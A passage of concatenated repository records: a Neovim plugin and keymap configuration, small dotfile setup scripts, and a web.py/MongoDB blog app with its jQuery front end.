\"c\" }, \"<C-v>\", '<c-r>+')\n\nvim.keymap.set(\"n\", \"<C-o>\", \"<C-o>zz\")\n\nrequire(\"lazy\").setup({\n \"folke/tokyonight.nvim\",\n 'nyoom-engineering/oxocarbon.nvim',\n {\n \"folke/which-key.nvim\",\n config = function()\n require(\"which-key\").setup {\n -- your configuration comes here\n -- or leave it empty to use the default settings\n -- refer to the configuration section below\n }\n end\n },\n\n -- { \"folke/neoconf.nvim\", cmd = \"Neoconf\" },\n { \"folke/neodev.nvim\",\n },\n\n {\n 'neovim/nvim-lspconfig',\n dependencies = {\n -- Automatically install LSPs to stdpath for neovim\n 'williamboman/mason.nvim',\n 'williamboman/mason-lspconfig.nvim',\n\n -- Useful status updates for LSP\n 'j-hui/fidget.nvim',\n\n -- Additional lua configuration, makes nvim stuff amazing\n 'folke/neodev.nvim',\n\n 'nvim-telescope/telescope.nvim',\n 'SmiteshP/nvim-navic',\n 'lvimuser/lsp-inlayhints.nvim'\n },\n config = function()\n -- LSP settings.\n -- This function gets run when an LSP connects to a particular buffer.\n local on_attach = function(client, bufnr)\n -- NOTE: Remember that lua is a real programming language, and as such it is possible\n -- to define small helper and utility functions so you don't have to repeat yourself\n -- many times.\n --\n -- In this case, we create a function that lets us more easily define mappings specific\n -- for LSP related items. It sets the mode, buffer and description for us each time.\n local nmap = function(keys, func, desc)\n if desc then\n desc = 'LSP: ' .. desc\n end\n vim.keymap.set({ 'n', 'v' }, keys, func, { buffer = bufnr, desc = desc })\n end\n require(\"lsp-inlayhints\").setup()\n require(\"lsp-inlayhints\").on_attach(client, bufnr, false)\n\n local navic = require('nvim-navic')\n navic.setup({})\n navic.attach(client, bufnr)\n\n local ts = require('telescope.builtin')\n\n nmap('<leader>rn', vim.lsp.buf.rename, '[R]e[n]ame')\n nmap('<leader>lc', vim.lsp.buf.code_action, 'Lsp code action')\n nmap('gd',\n function()\n vim.lsp.buf.definition()\n vim.api.nvim_input('zz')\n end, '[G]oto [D]efinition')\n nmap('gr', ts.lsp_references, '[G]oto [R]eferences')\n nmap('gI', vim.lsp.buf.implementation, '[G]oto [I]mplementation')\n nmap('<leader>D', vim.lsp.buf.type_definition, 'Type [D]efinition')\n nmap('<leader>ld', ts.lsp_document_symbols, '[D]ocument [S]ymbols')\n nmap('<leader>li', ts.lsp_implementations, '[G]oto [I]mplementation')\n nmap('<leader>lk', function()\n vim.diagnostic.open_float({\n source = true,\n })\n end, '[G]oto [I]mplementation')\n nmap('gi', ts.lsp_implementations, '[G]oto [I]mplementation')\n nmap('<leader>ls', ts.lsp_dynamic_workspace_symbols, '[W]orkspace [S]ymbols')\n nmap('<leader>ls',\n function()\n local sorters = require \"telescope.sorters\"\n ts.lsp_dynamic_workspace_symbols({\n sorter = sorters.get_generic_fuzzy_sorter()\n })\n end,\n 'lsp')\n nmap('<leader>lf',\n function()\n ts.lsp_dynamic_workspace_symbols({\n symbols = {\n 'function',\n 'method',\n }\n })\n end,\n 'LSP Fuctions')\n nmap('<leader>lt',\n function()\n ts.lsp_dynamic_workspace_symbols({\n symbols = {\n 'struct',\n 'typeparameter',\n 'interace',\n 'enum',\n 'struct',\n 'class',\n }\n })\n end,\n 'LSP Types')\n nmap('K', vim.lsp.buf.hover, 'Hover Documentation')\n nmap('<C-k>', vim.lsp.buf.signature_help, 'Signature Documentation')\n -- Lesser used LSP functionality\n nmap('gD', vim.lsp.buf.declaration, '[G]oto [D]eclaration')\n\n nmap('<leader>ff', vim.lsp.buf.format, '[F]ormat')\n\n -- Create a command `:Format` local to the LSP buffer\n vim.api.nvim_buf_create_user_command(bufnr, 'Format', function(_)\n vim.lsp.buf.format()\n end, { desc = 'Format current buffer with LSP' })\n end\n -- Enable the following language servers\n -- Feel free to add/remove any LSPs that you want here. They will automatically be installed.\n --\n -- Add any additional override configuration in the following tables. They will be passed to\n -- the `settings` field of the server config. You must look up that documentation yourself.\n local servers = {\n -- clangd = {},\n -- gopls = {},\n -- pyright = {},\n -- rust_analyzer = {},\n -- tsserver = {},\n rust_analyzer = {\n ['rust-analyzer'] = {\n diagnostics = {\n enable = false,\n },\n checkOnSave = {\n command = \"clippy\",\n },\n workspace = {\n symbol = {\n search = {\n kind = \"all_symbols\"\n }\n }\n },\n procMacro = {\n enable = true\n }\n }\n },\n sumneko_lua = {\n Lua = {\n workspace = { checkThirdParty = false },\n telemetry = { enable = false },\n },\n },\n }\n -- Setup neovim lua configuration\n require('neodev').setup()\n --\n -- nvim-cmp supports additional completion capabilities, so broadcast that to servers\n local capabilities = vim.lsp.protocol.make_client_capabilities()\n capabilities = require('cmp_nvim_lsp').default_capabilities(capabilities)\n capabilities.textDocument.completion.completionItem.resolveSupport = {\n properties = {\n \"additionalTextEdits\",\n },\n }\n -- Setup mason so it can manage external tooling\n require('mason').setup()\n -- Ensure the servers above are installed\n local mason_lspconfig = require 'mason-lspconfig'\n mason_lspconfig.setup {\n ensure_installed = vim.tbl_keys(servers),\n }\n\n mason_lspconfig.setup_handlers {\n function(server_name)\n require('lspconfig')[server_name].setup {\n capabilities = capabilities,\n on_attach = on_attach,\n settings = servers[server_name],\n }\n end,\n }\n\n require('fidget').setup()\n end\n },\n {\n 'onsails/lspkind.nvim',\n config = function()\n require('lspkind').init()\n end\n },\n\n {\n 'L3MON4D3/LuaSnip',\n version = \"v1.*\",\n -- install jsregexp (optional!).\n -- build = \"make install_jsregexp\"\n },\n\n {\n -- Autocompletion\n 'hrsh7th/nvim-cmp',\n dependencies = { 'hrsh7th/cmp-nvim-lsp', 'L3MON4D3/LuaSnip', 'saadparwaiz1/cmp_luasnip', 'onsails/lspkind.nvim',\n 'hrsh7th/cmp-nvim-lsp-signature-help' },\n config = function()\n -- nvim-cmp setup\n local cmp = require 'cmp'\n local luasnip = require 'luasnip'\n -- luasnip.setup({\n -- history = true\n -- })\n -- luasnip.config.setup {}\n\n local function maybe_load_vscode_snippets()\n local Path = require(\"luasnip.util.path\")\n local cur_dir = vim.fn.getcwd()\n local vscode_dir = Path.join(cur_dir, \".vscode\")\n local package_json_file = Path.join(vscode_dir, \"package.json\")\n if Path.exists(package_json_file)\n then\n require(\"luasnip.loaders.from_vscode\").lazy_load({\n paths = vscode_dir\n })\n end\n end\n\n --maybe_load_vscode_snippets()\n require(\"luasnip.loaders.from_vscode\").lazy_load({ paths = { \"/home/maik/projects/ark-modules/.vscode\" } })\n cmp.setup {\n -- formatting = {\n -- fields = { \"kind\", \"abbr\", \"menu\" },\n -- format = function(entry, vim_item)\n -- local kind = require(\"lspkind\").cmp_format({ mode = \"symbol_text\", maxwidth = 50 })(entry,\n -- vim_item)\n -- local strings = vim.split(kind.kind, \"%s\", { trimempty = true })\n -- kind.kind = \" \" .. strings[1] .. \" \"\n -- kind.menu = \" (\" .. strings[2] .. \")\"\n --\n -- return kind\n -- end,\n -- },\n window = {\n completion = {\n border = 'shadow',\n winhighlight = \"Normal:Normal,FloatBorder:Visual,Search:None,CursorLine:Visual\",\n col_offset = -3,\n side_padding = 0,\n scrollbar = false\n },\n },\n snippet = {\n expand = function(args)\n luasnip.lsp_expand(args.body)\n end,\n },\n mapping = cmp.mapping.preset.insert {\n ['<C-d>'] = cmp.mapping.scroll_docs(-4),\n ['<C-f>'] = cmp.mapping.scroll_docs(4),\n ['<C-Space>'] = cmp.mapping.complete({}),\n ['<CR>'] = cmp.mapping.confirm {\n behavior = cmp.ConfirmBehavior.Replace,\n select = true,\n },\n ['<Tab>'] = cmp.mapping(function(fallback)\n if cmp.visible() then\n cmp.select_next_item()\n else\n fallback()\n end\n end, { 'i', 's' }),\n ['<S-Tab>'] = cmp.mapping(function(fallback)\n if cmp.visible() then\n cmp.select_prev_item()\n else\n fallback()\n end\n end, { 'i', 's' }),\n },\n sources = {\n { name = 'nvim_lsp', priority = 9 },\n { name = 'luasnip', priority = 1 },\n { name = 'nvim_lsp_signature_help' },\n { name = 'path' }\n },\n }\n vim.keymap.set({ 'i', 's' }, '<C-k>',\n function()\n if luasnip.expand_or_jumpable() then\n luasnip.expand_or_jump()\n end\n end,\n { desc = 'Snippet next' })\n\n vim.keymap.set({ 'i', 's' }, '<C-j>',\n function()\n luasnip.jump(-1)\n end,\n { desc = 'Snippet prev' })\n end\n },\n\n {\n 'nvim-telescope/telescope.nvim',\n dependencies = {\n { 'nvim-lua/plenary.nvim' },\n { 'nvim-telescope/telescope-ui-select.nvim' },\n {\n 'nvim-telescope/telescope-fzf-native.nvim',\n build =\n 'cmake -S. -Bbuild -DCMAKE_BUILD_TYPE=Release && cmake --build build --config Release && cmake --install build --prefix build'\n },\n { 'nvim-telescope/telescope-fzy-native.nvim' },\n { 'olimorris/persisted.nvim' },\n { 'benfowler/telescope-luasnip.nvim' },\n { 'L3MON4D3/LuaSnip' }\n\n\n },\n config = function()\n local fzf_opts = {\n fuzzy = true, -- false will only do exact matching\n override_generic_sorter = true, -- override the generic sorter\n override_file_sorter = true, -- override the file sorter\n case_mode = \"smart_case\", -- or \"ignore_case\" or \"respect_case\"\n }\n require(\"telescope\").setup {\n pickers = {\n find_files = {\n find_command = {\n 'rg', '--ignore', '-L', '--hidden', '--files'\n }\n }\n },\n extensions = {\n [\"ui-select\"] = {\n require(\"telescope.themes\").get_dropdown {\n }\n },\n fzf = fzf_opts,\n },\n }\n\n require(\"telescope\").load_extension(\"ui-select\")\n require('telescope').load_extension('fzf')\n require('telescope').load_extension('persisted')\n require('telescope').load_extension('luasnip')\n\n local ts = require('telescope.builtin')\n vim.keymap.set('n', '<leader>sf', ts.find_files, { desc = '[S]earch [F]iles' })\n vim.keymap.set('n', '<leader>sr', ts.resume, { desc = 'Search Resume' })\n vim.keymap.set('n', '<leader>sh', ts.help_tags, { desc = '[S]earch [H]elp' })\n vim.keymap.set('n', '<leader>sw', ts.grep_string, { desc = '[S]earch current [W]ord' })\n vim.keymap.set('n', '<leader>sg', ts.live_grep, { desc = '[S]earch by [G]rep' })\n vim.keymap.set('n', '<leader>le', ts.diagnostics, { desc = '[S]earch [D]iagnostics' })\n vim.keymap.set('n', '<leader>vt', ts.colorscheme, { desc = 'Theme' })\n vim.keymap.set('n', '<leader>vk', ts.keymaps, { desc = 'keymap' })\n vim.keymap.set('n', '<leader>ss', ts.current_buffer_fuzzy_find, { desc = 'Search in File' })\n vim.keymap.set('n', '<leader>vh', ts.help_tags, { desc = 'Help tags' })\n vim.keymap.set('n', '<leader>vup', require('lazy').show, { desc = 'Lazy' })\n vim.keymap.set('n', '<leader>pp', ':Telescope persisted<CR>', { desc = 'Find session' })\n vim.keymap.set('n', '<leader>vul', ':Mason<CR>', { desc = 'Mason LSP' })\n end\n },\n\n {\n 'nvim-lualine/lualine.nvim',\n dependencies = { 'nvim-tree/nvim-web-devicons', 'SmiteshP/nvim-navic' },\n config = function()\n local navic = require(\"nvim-navic\")\n require('lualine').setup({\n sections = {\n lualine_c = {\n { navic.get_location, cond = navic.is_available },\n }\n }\n })\n end\n },\n {\n 'kdheepak/tabline.nvim',\n config = function()\n require 'tabline'.setup {\n options = {\n show_tabs_only = true,\n show_tabs_always = true\n }\n }\n vim.cmd [[\n set guioptions-=e \" Use showtabline in gui vim\n ]]\n end,\n dependencies = { 'nvim-lualine/lualine.nvim', 'nvim-tree/nvim-web-devicons' }\n },\n {\n \"nvim-treesitter/nvim-treesitter\",\n build = \":TSUpdate\",\n event = { \"BufReadPost\" },\n dependencies = { 'p00f/nvim-ts-rainbow' },\n config = function()\n require 'nvim-treesitter.configs'.setup {\n -- A list of parser names, or \"all\"\n ensure_installed = { \"c\", \"lua\", \"rust\", \"toml\", \"help\" },\n sync_install = false,\n highlight = {\n enable = true,\n },\n rainbow = {\n enable = true,\n extended_mode = true,\n }\n }\n end\n },\n {\n \"olimorris/persisted.nvim\",\n event = { 'VeryLazy' },\n config = function()\n require(\"persisted\").setup({\n --autoload = true,\n allowed_dirs = {\n '~/projects',\n '~/.config/nvim'\n },\n })\n vim.keymap.set('n', '<leader>ps', ':SessionLoad<CR>:SessionStart<CR>', { desc = 'Load Session' })\n vim.keymap.set('n', '<leader>pc', ':SessionStart<CR>', { desc = 'Create Session' })\n end,\n },\n {\n \"windwp/nvim-autopairs\",\n config = function()\n require(\"nvim-autopairs\").setup {}\n local npairs = require('nvim-autopairs')\n local Rule = require('nvim-autopairs.rule')\n npairs.add_rule(Rule(\"<\", \">\"))\n end\n },\n ({\n \"kylechui/nvim-surround\",\n config = function()\n require(\"nvim-surround\").setup({})\n end\n }),\n {\n 'TimUntersberger/neogit',\n dependencies = { 'nvim-lua/plenary.nvim', 'sindrets/diffview.nvim' },\n config = function()\n local neogit = require('neogit')\n neogit.setup {\n integrations = {\n diffview = true\n },\n disable_commit_confirmation = true,\n }\n\n\n vim.keymap.set('n', '<leader>gs', neogit.open, { desc = 'Git status' })\n end\n },\n { 'sindrets/diffview.nvim', dependencies = { 'nvim-lua/plenary.nvim' } },\n {\n 'ibhagwan/fzf-lua',\n -- optional for icon support\n dependencies = { 'nvim-tree/nvim-web-devicons' }\n },\n\n --{ 'chaoren/vim-wordmotion' },\n {\n 'nvim-tree/nvim-tree.lua',\n dependencies = {\n 'nvim-tree/nvim-web-devicons', -- optional, for file icons\n },\n config = function()\n require('nvim-tree').setup({\n\n })\n vim.keymap.set(\"n\", \"<leader>ft\", ':NvimTreeFindFileToggle<CR>', { desc = 'File Explorer' })\n end\n },\n {\n \"ggandor/leap.nvim\",\n config = function()\n local leap = require(\"leap\")\n leap.setup({\n })\n vim.keymap.set('n', 'r', '<Plug>(leap-forward-to)', { desc = 'Leap forward' })\n vim.keymap.set('n', 'R', '<Plug>(leap-backward-to)', { desc = 'Leap backward' })\n end,\n },\n {\n 'lukas-reineke/indent-blankline.nvim',\n config = function()\n require(\"indent_blankline\").setup {}\n end\n },\n {\n 'numToStr/Comment.nvim',\n config = function()\n require('Comment').setup()\n end\n },\n {\n 'numToStr/FTerm.nvim',\n config = function()\n require 'FTerm'.setup({\n border = 'double',\n dimensions = {\n height = 0.9,\n width = 0.9,\n },\n cmd = 'zsh'\n })\n vim.keymap.set('n', '<A-i>', '<CMD>lua require(\"FTerm\").toggle()<CR>')\n vim.keymap.set('t', '<A-i>', '<C-\\\\><C-n><CMD>lua require(\"FTerm\").toggle()<CR>')\n local fterm = require(\"FTerm\")\n\n\n local lazygit = fterm:new({\n ft = 'fterm_lazygit',\n cmd = 'lazygit',\n })\n\n vim.keymap.set('n', '<leader>gt', function() lazygit:toggle() end, { desc = 'Lazygit' })\n\n local gitui = fterm:new({\n ft = 'fterm_gitui',\n cmd = 'gitui',\n })\n\n vim.keymap.set('n', '<leader>gf', function() gitui:toggle() end, { desc = 'Gitui' })\n end\n },\n {\n 'glacambre/firenvim',\n build = function() vim.fn['firenvim#install'](0) end\n },\n {\n 'tpope/vim-fugitive',\n config = function()\n vim.keymap.set('n', '<leader>gg', ':Git<CR>', { desc = 'Fugitive' })\n end\n },\n {\n 'tpope/vim-rhubarb'\n },\n {\n 'kburdett/vim-nuuid'\n },\n -- {\n -- 'simrat39/rust-tools.nvim',\n -- config = function()\n -- local rt = require(\"rust-tools\")\n --\n -- rt.setup({\n -- server = {\n -- on_attach = function(_, bufnr)\n -- end,\n -- },\n -- })\n -- end\n -- }\n -- {\n -- 'rmagatti/auto-session',\n -- config = function()\n -- require(\"auto-session\").setup {\n -- }\n -- end\n -- }\n}, {\n install = {\n colorscheme = { mycolorscheme }\n }\n})\n\nvim.cmd.colorscheme(mycolorscheme)\n\nif vim.fn.exists(\"g:neovide\") then\n vim.g.neovide_cursor_animation_length = 0.0\n vim.g.neovide_confirm_quit = false\n vim.g.neovide_refresh_rate = 120\nend\n" }, { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6744186282157898, "avg_line_length": 31.25, "blob_id": "8ea514e0d11c248af6b5efb2b8281adf6a5da647", "content_id": "07718def7d6bde84e8c24fd8c752ef48648a45f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "no_license", "max_line_length": 62, "num_lines": 4, "path": "/penrose/scripts/unlock-ssh-helper.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# Allow for the ssh-add script to be run on startup as part of\n# `unlock-ssh.sh`\necho | dmenu -p \"SSH Password: \" -P\n" }, { "alpha_fraction": 0.5556097626686096, "alphanum_fraction": 0.5565853714942932, "avg_line_length": 34.96491241455078, "blob_id": "c0e10033713decaea4edf61b6eea329d86b36090", "content_id": "75c2601742d3e127c7bf4fbe6cfe02f18f8f892a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 2050, "license_type": "no_license", "max_line_length": 98, "num_lines": 57, "path": "/nvim/oldconfig/lua/mappings.lua", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "local function map(mode, lhs, rhs, opts)\n\tlocal options = { noremap = true }\n\tif opts then\n\t\toptions = vim.tbl_extend(\"force\", options, opts)\n\tend\n\tvim.api.nvim_set_keymap(mode, lhs, rhs, options)\nend\n\nlocal opt = {}\nmap(\"n\", \"<C-t>t\", [[<Cmd> tabnew | term <CR>]], opt) -- term newtab\nmap(\"n\", \"<leader>fer\", [[<Cmd> lua require('plenary').reload_modules()<CR>]], opt) -- term newtab\n\n-- COPY EVERYTHING --\nmap(\"n\", \"<C-a>\", [[ <Cmd> %y+<CR>]], opt)\n\n-- toggle numbers ---\nmap(\"n\", \"<leader>n\", [[ <Cmd> set nu!<CR>]], opt)\n\n-- toggle truezen.nvim's ataraxis and minimalist mode\nmap(\"n\", \"<leader>z\", [[ <Cmd> TZAtaraxis<CR>]], opt)\nmap(\"n\", \"<leader>m\", [[ <Cmd> TZMinimalist<CR>]], opt)\n\nmap(\"n\", \"<C-s>\", [[ <Cmd> w <CR>]], opt)\n\nfor i = 1, 9 do\n\tmap(\"n\", \"<leader>o\" .. i, i .. \"gt\", opt)\n\tmap(\"n\", \"<leader>om\" .. i, \":tabm\" .. i .. \"<CR>\", opt)\n\tmap(\"n\", \"<leader>\" .. i, \":\" .. i .. \"wincmd w<CR>\", opt)\nend\n\nmap(\"n\", \"<leader>od\", \":tabclose<CR>\", opt)\nmap(\"n\", \"<leader>oc\", \":tabnew<CR>:tabmove<CR>\", opt)\nmap(\"n\", \"<leader>sc\", \":noh<CR>\", opt)\nmap(\"i\", \"<C-s>\", \"<esc>:w<CR>\", opt)\nmap(\"n\", \"<C-s>\", \":w<CR>\", opt)\nmap(\"n\", \"<leader>gs\", \":Git<CR>\", opt)\n\nmap(\"n\", \"<leader>ls\", \":FindSymbols<CR>\", opt)\nmap(\"n\", \"<leader>lf\", \":FindFunctions<CR>\", opt)\nmap(\"n\", \"<leader>li\", \":FindImpls<CR>\", opt)\n\nmap(\"n\", \"<leader>y\", '\"+y', opt)\nmap(\"v\", \"<leader>y\", '\"+y', opt)\n\n--map(\"n\", \"<Leader>ca\", [[<Cmd>lua require('telescope.builtin').lsp_code_actions()<CR>]], opt)\nmap(\"n\", \"<Leader>ca\", \":CodeActionMenu<CR>\", opt)\n--map(\"n\", \"<leader>ca\", \":Lspsaga code_action<CR>\", opt)\n--map(\"v\", \"<leader>ca\", \":Lspsaga range code_action<CR>\", opt)\n--map(\"n\", \"gp\", \":Lspsaga preview_definition<CR>\", opt)\n\nmap(\"n\", \"<leader>el\", \":TroubleToggle<CR>\", opt)\nmap(\"n\", \"<leader>ee\", \":Lspsaga show_line_diagnostics<CR>\", opt)\nmap(\"n\", \"<leader>gc\", \":Git commit -v -q<CR>\", opt)\n\nmap(\"n\", \"r\", \"<Plug>(leap-forward-to)\", opt)\nmap(\"n\", \"R\", \"<Plug>(leap-backward-to)\", opt)\n--vim.keymap.set(\"n\", \"r\", require(\"leap\").leap-forward-to, {silent = true})\n" }, { "alpha_fraction": 0.6336206793785095, "alphanum_fraction": 0.6434729099273682, "avg_line_length": 38.585365295410156, "blob_id": "56db6d7d36036724f8c534aee9565f9a7e13b410", "content_id": "5f8a708848d36d4d9cd0b7e5651efb2d9d893fb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1624, "license_type": "no_license", "max_line_length": 86, "num_lines": 41, "path": "/config.sh", "repo_name": "MaikKlein/dotfiles", "src_encoding": "UTF-8", "text": "ln -s -f \"$(pwd)/zsh/.zshrc\" ~/.zshrc\nln -s -f \"$(pwd)/zsh/.zshenv\" ~/.zshenv\nln -s -f \"$(pwd)/spacemacs/.spacemacs\" ~/.spacemacs\nmkdir -p ~/.config/nvim\nln -s -f \"$(pwd)/nvim/.config/nvim/init.vim\" ~/.config/nvim/init.vim\nln -s -f \"$(pwd)/nvim/.config/nvim/coc-settings.json\" ~/.config/nvim/coc-settings.json\nln -s -f \"$(pwd)/tmux/.tmux.conf\" ~/.tmux.conf\nmkdir -p ~/.config/tmux\nln -s -f \"$(pwd)/tmux/solarized.theme\" ~/.config/tmux/solarized.theme\nln -s -f \"$(pwd)/vim/.vimrc\" ~/.vimrc\nmkdir -p ~/.i3\nln -s -f \"$(pwd)/i3/.i3/config\" ~/.i3/config\nln -s -f \"$(pwd)/X/.Xresources\" ~/.Xresources\nln -s -f \"$(pwd)/X/.xinitrc\" ~/.xinitrc\n\nmkdir -p ~/.config/bspwm\nln -s -f \"$(pwd)/bspwm/.config/bspwm/bspwmrc\" ~/.config/bspwm/bspwmrc\nmkdir -p ~/.config/sxhkd\nln -s -f \"$(pwd)/bspwm/.config/sxhkd/sxhkdrc\" ~/.config/sxhkd/sxhkdrc\nln -s -f \"$(pwd)/compton/compton.conf\" ~/compton.conf\n\nmkdir -p ~/.config/polybar\nln -s -f \"$(pwd)/polybar/.config/polybar/config\" ~/.config/polybar/config\ncp -rsf \"$(pwd)/.IntelliJIdea2017.2\" ~/.IntelliJIdea2017.2\nln -s -f \"$(pwd)/ideavimrc/.ideavimrc\" ~/.ideavimrc\n\nmkdir -p ~/.config/fish\nln -s -f \"$(pwd)/fish/.config/fish/config.fish\" ~/.config/fish/config.fish\nln -s -f \"$(pwd)/fish/.config/fish/fishfile\" ~/.config/fish/fishfile\nln -s -f \"$(pwd)/fish/.config/fish/functions\" ~/.config/fish/functions\n\nmkdir -p ~/.config/kitty\nln -s -f \"$(pwd)/kitty/.config/kitty/kitty.conf\" ~/.config/kitty/kitty.conf\n\nln -s -f -d \"$(pwd)/awesome\" ~/.config\n\nln -s -f -d \"$(pwd)/blender\" ~/.config\n\nln -s -f -d \"$(pwd)/nvim\" ~/.config/nvim\n\nln -s -f \"$(pwd)/mouse/gpro.conf\" /etc/X11/xorg.conf.d/gpro.conf\n\n" } ]
33
ras592/blog-mini
https://github.com/ras592/blog-mini
66532711497cea25527a0d234e864aedd99628e0
9b35ac8358267ad6b8165224fae27c259f146aa6
d2da3e05f5dc1cea5c0c574ce0980433c11a05f8
refs/heads/master
2021-01-10T05:40:50.108521
2016-03-24T21:43:28
2016-03-24T21:43:28
54,444,458
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.574018120765686, "alphanum_fraction": 0.5763421058654785, "avg_line_length": 29.735713958740234, "blob_id": "785a1358e94d23a930fdd3efd0c04876ec4c8211", "content_id": "5668f42b706cbae3ff9e51eff9eeeab6fb7fb52e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4303, "license_type": "no_license", "max_line_length": 91, "num_lines": 140, "path": "/app.py", "repo_name": "ras592/blog-mini", "src_encoding": "UTF-8", "text": "#!venv/bin/python\nimport web, os, json\nfrom jinja2 import Environment, FileSystemLoader\nimport pymongo\nfrom bson.objectid import ObjectId\n\nurls = (\n '/', 'index',\n '/post', 'Post',\n '/postDel', 'PostDel'\n)\n\napp = web.application(urls, globals())\n\nconnection = pymongo.MongoClient('localhost', 27017)\ndb = connection.test\n\nglobals = {}\njinja_env = Environment(\n loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')),\n extensions=[],\n )\njinja_env.globals.update(globals)\n\ndef render_template(template_name, **context):\n global jinja_env\n\n #jinja_env.update_template_context(context)\n return jinja_env.get_template(template_name).render(context)\n\ndef validate(post_id, post_title, post_body):\n \"\"\"Gives back a valid dictionary to be converted into JSON.\n Parameters:\n post_id: ObjectID object\n post_title: String\n post_body: String\n Returns:\n dict: Returns the string value of ObjectID, string postTitle, and string postBody.\n \"\"\"\n return {\n \"postId\": str(post_id),\n \"postTitle\": post_title,\n \"postBody\": post_body\n }\n\nclass index:\n def GET(self):\n \"\"\"Handles GET method for index route.\n Renders the template index.html.\n\n Returns:\n render_template: Renders index.html template.\n \"\"\"\n return render_template('index.html')\n\nclass Post:\n def GET(self):\n \"\"\"Handles GET method for post route.\n Uses the validate helper method to change the format of the dict to match client\n json keys.\n\n Returns:\n json: Returns JSON object with the keys: success and array of posts dictionary.\n \"\"\"\n try:\n posts = db.posts.find()\n posts = filter(lambda post:\n not None in (post.get('_id'), post.get('title'), post.get('body')),\n posts)\n posts = map(lambda post:\n validate(post.get('_id'), post.get('title'), post.get('body')),\n posts)\n except Exception as e:\n print e\n posts = []\n return json.dumps({\"status\": \"success\", \"posts\": posts})\n\n\n def POST(self):\n \"\"\"Handles POST method for post route.\n Validates the input from the user.\n Inserts the title and body values into MongoDB and gets the ObjectID\n for the entry.\n Uses the validate helper method to change the format of the dict to match client\n json keys.\n Handles exception for any MongoDB errors silently.\n\n Returns:\n json: Returns JSON object with the keys: success and valid_post dictionary.\n \"\"\"\n inp = web.input()\n title, body = inp.get('postTitle'), inp.get('postBody')\n if None in (title, body):\n return json.dumps({'status': 'error'})\n if len(title) == 0 or len(body) == 0:\n return json.dumps({'status': 'error'})\n post = {\n 'title': title,\n 'body': body\n }\n\n try:\n post_id = db.posts.insert_one(post).inserted_id\n except Exception as e:\n print e\n return json.dumps({'status': 'error'})\n valid_post = validate(post_id, title, body)\n return json.dumps({'status': 'success', 'post': valid_post})\n\n\nclass PostDel:\n def POST(self):\n \"\"\"Handles POST method for postDel route.\n Validates the input from the user.\n post_id value is used to remove a document from MongoDB.\n Handles exception for any MongoDB errors silently.\n\n Returns:\n json: Returns JSON object with the success message.\n \"\"\"\n inp = web.input()\n post_id = inp.get('postId')\n\n if post_id is None:\n return json.dumps({'status': 'error'})\n if len(post_id) == 0:\n return json.dumps({'status': 'error'})\n\n try:\n result = db.posts.delete_one({'_id': ObjectId(post_id)})\n if result.deleted_count != 1:\n raise Exception('One document was not deleted.')\n except Exception as e:\n print e\n return json.dumps({'status': 'error'})\n return json.dumps({'status': 'success'})\n\n\nif __name__ == \"__main__\":\n app.run()\n" }, { "alpha_fraction": 0.4844863712787628, "alphanum_fraction": 0.48553457856178284, "avg_line_length": 28.627328872680664, "blob_id": "b437672dbc1797a80e3d90f9026ab8757d79ca75", "content_id": "d2dbf4d6cbe0f5469dcdd687031cf62d40a2f192", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4770, "license_type": "no_license", "max_line_length": 91, "num_lines": 161, "path": "/static/js/blog.js", "repo_name": "ras592/blog-mini", "src_encoding": "UTF-8", "text": "var blog = (function() {\n var posts = [];\n\n // cache DOM\n var $container = $('.container');\n var $feed = $('#feed');\n var $blogFormButton = $('#blogForm button');\n var $postTitle = $('#postTitle');\n var $postBody = $('#postBody');\n var $postTitleForm = $('.postTitle');\n var $postBodyForm = $('.postBody');\n var $postTitleError = $('#postTitleError');\n var $postBodyError = $('#postBodyError');\n var template = $feed.find('#postTemplate').html();\n\n var uploadMsg = [\n '<div class=\"flash alert alert-dismissible alert-success\" role=\"alert\">',\n '<strong>Successfully uploaded!</strong>',\n '<button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\">',\n '<span aria-hidden=\"true\">&times;</span>',\n '</button>',\n '</div>'\n ].join(\"\");\n\n var removeMsg = [\n '<div class=\"flash alert alert-dismissible alert-success\" role=\"alert\">',\n '<strong>Successfully removed!</strong>',\n '<button type=\"button\" class=\"close\" data-dismiss=\"alert\" aria-label=\"Close\">',\n '<span aria-hidden=\"true\">&times;</span>',\n '</button>',\n '</div>'\n ].join(\"\");\n\n // bind events\n $blogFormButton.on('click', addToFeed);\n $feed.delegate('.removeIcon', 'click', deleteFromFeed);\n $postTitle.focus(_removePostTitleError);\n $postBody.focus(_removePostBodyError);\n\n _render();\n\n function _render() {\n $feed.html(Mustache.render(template, {posts: posts}));\n }\n\n function _clearInputs() {\n $postTitle.val('');\n $postBody.val('');\n }\n\n function _removePostTitleError() {\n $postTitleError.hide();\n }\n\n function _removePostBodyError() {\n $postBodyError.hide();\n }\n\n function _addToPosts(postId, postTitle, postBody) {\n posts.push({\"postId\": postId, \"postTitle\": postTitle, \"postBody\": postBody});\n _render();\n }\n\n function init() {\n // make request for JSON\n var url = \"./post\",\n args = {},\n callback = function (resp) {\n resp = $.parseJSON(resp);\n resp = resp.posts;\n resp.forEach( function(post) {\n _addToPosts(post.postId, post.postTitle, post.postBody);\n });\n };\n $.get(url, args, callback);\n }\n\n function addToFeed(value) {\n var post;\n var errors = [];\n if(value.hasOwnProperty(\"postTitle\") && value.hasOwnProperty(\"postBody\")) {\n post = {\"postTitle\": value.postTitle, \"postBody\": value.postBody};\n } else {\n post = {\n \"postTitle\": $.trim($postTitle.val()),\n \"postBody\": $.trim($postBody.val())\n };\n }\n\n if(post.postTitle.length === 0) {\n // title wasn't given\n $postTitleError.show();\n errors.push('No title');\n }\n\n if(post.postBody.length === 0) {\n // body wasn't given\n $postBodyError.show();\n errors.push('No body');\n }\n\n console.log(errors.length);\n\n if(errors.length === 0) {\n var url = \"./post\",\n args = {\n \"postTitle\": post.postTitle,\n \"postBody\": post.postBody\n },\n callback = function (resp) {\n 